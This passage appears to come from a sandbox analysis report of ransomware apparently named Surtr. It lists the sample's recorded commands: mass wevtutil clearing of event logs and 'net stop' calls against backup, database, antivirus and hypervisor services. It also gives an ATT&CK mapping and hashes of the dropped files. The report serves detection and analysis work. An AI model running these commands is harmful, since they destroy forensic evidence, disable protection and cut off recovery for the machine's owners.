C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MCT/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NTLM/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetShell/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "SQLBrowser"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"3⤵
-
C:\Windows\system32\net.exenet stop "SQLWriter"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"3⤵
-
C:\Windows\system32\net.exenet stop "SstpSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"3⤵
-
C:\Windows\system32\net.exenet stop "svcGenericHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"3⤵
-
C:\Windows\system32\net.exenet stop "tmlisten"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"3⤵
-
C:\Windows\system32\net.exenet stop "TrueKey"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"3⤵
-
C:\Windows\system32\net.exenet stop "UI0Detect"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamMountSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"3⤵
-
C:\Windows\system32\net.exenet stop "W3Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"3⤵
-
C:\Windows\system32\net.exenet stop "WRSVC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"3⤵
-
C:\Windows\system32\net.exenet stop "swi_update"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"3⤵
-
C:\Windows\system32\net.exenet stop "SQL Backups"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"3⤵
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "msftesql$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"3⤵
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"3⤵
-
C:\Windows\system32\net.exenet stop "EhttpSrv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"3⤵
-
C:\Windows\system32\net.exenet stop "ekrn"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"3⤵
-
C:\Windows\system32\net.exenet stop "ESHASRV"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"3⤵
-
C:\Windows\system32\net.exenet stop "AVP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"3⤵
-
C:\Windows\system32\net.exenet stop "klnagent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"3⤵
-
C:\Windows\system32\net.exenet stop "HvHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"3⤵
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"3⤵
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"3⤵
-
C:\Windows\system32\net.exenet stop "vmicshutdown"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"3⤵
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"3⤵
-
C:\Windows\system32\net.exenet stop "vmcompute"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvmsession"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"3⤵
-
C:\Windows\system32\net.exenet stop "vmicrdv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"3⤵
-
C:\Windows\system32\net.exenet stop "vmictimesync"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvss"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"3⤵
-
C:\Windows\system32\net.exenet stop "VMAuthdService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"3⤵
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"3⤵
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"3⤵
-
C:\Windows\system32\net.exenet stop "VMwareHostd"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"3⤵
-
C:\Windows\system32\net.exenet stop "Sense"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"3⤵
-
C:\Windows\system32\net.exenet stop "WdNisSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"3⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"1⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"2⤵
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
- Hidden Files and Directories (1)
Defense Evasion
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- Modify Registry (4)
- Indicator Removal on Host (1)
- File Deletion (2)
- Hidden Files and Directories (1)
Downloads
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
  Filesize: 8KB
  MD5: c3df410a4e482aedc4f65be42d97daff
  SHA1: 8602bbe25e87df92110732ccadda2d96eb82f4cf
  SHA256: 18452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a
  SHA512: 614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt
  Filesize: 621B
  MD5: 4c97b7389e84da2773ccb3443c234ae1
  SHA1: 7c66be6a0632a44ac2017e6e1bbd8f29809b61e2
  SHA256: 2d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058
  SHA512: c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe
  Filesize: 320KB
  MD5: e6fc190168519d6a6c4f1519e9450f0f
  SHA1: af2080ddf1064fb80c7b9af942aaabf264441098
  SHA256: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
  SHA512: 4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
- C:\ProgramData\Service\ID_DATA.surt
  Filesize: 14B
  MD5: a400ab7041049318608e1a9271e99d16
